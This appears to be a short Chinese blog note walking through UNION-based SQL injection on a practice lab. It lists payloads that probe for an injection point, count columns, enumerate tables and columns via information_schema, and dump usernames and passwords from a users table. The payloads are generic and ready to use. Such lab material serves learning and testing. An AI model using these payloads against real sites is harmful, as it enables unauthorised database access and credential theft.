首先是一些SQL的语句(12条消息) SQL注入语句大全_张自强的博客-CSDN博客_sql注入语句
order by 4 -- -
判断有多少列
union select 1,2,3 -- -
判断数据显示点
union select 1,user(),database()?? -- -
?显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -
查看账号密码信息
先在靶场里看看有没有断点,判断注入点
然后注入语句:
id=1' and 1=1 -- -判断注入点把1=1换为1=2发现不报错也不现实任何信息,就可以利用 ’ 字符注入
确定注入字符后,判断有多少列, 超出列数会报错
id=1' order by 4 -- -然后判断数据显示点 (id一定要改为0或负数)
id=0' union select 1,2,3 -- -
id=-1' union select 1,2,3 --+
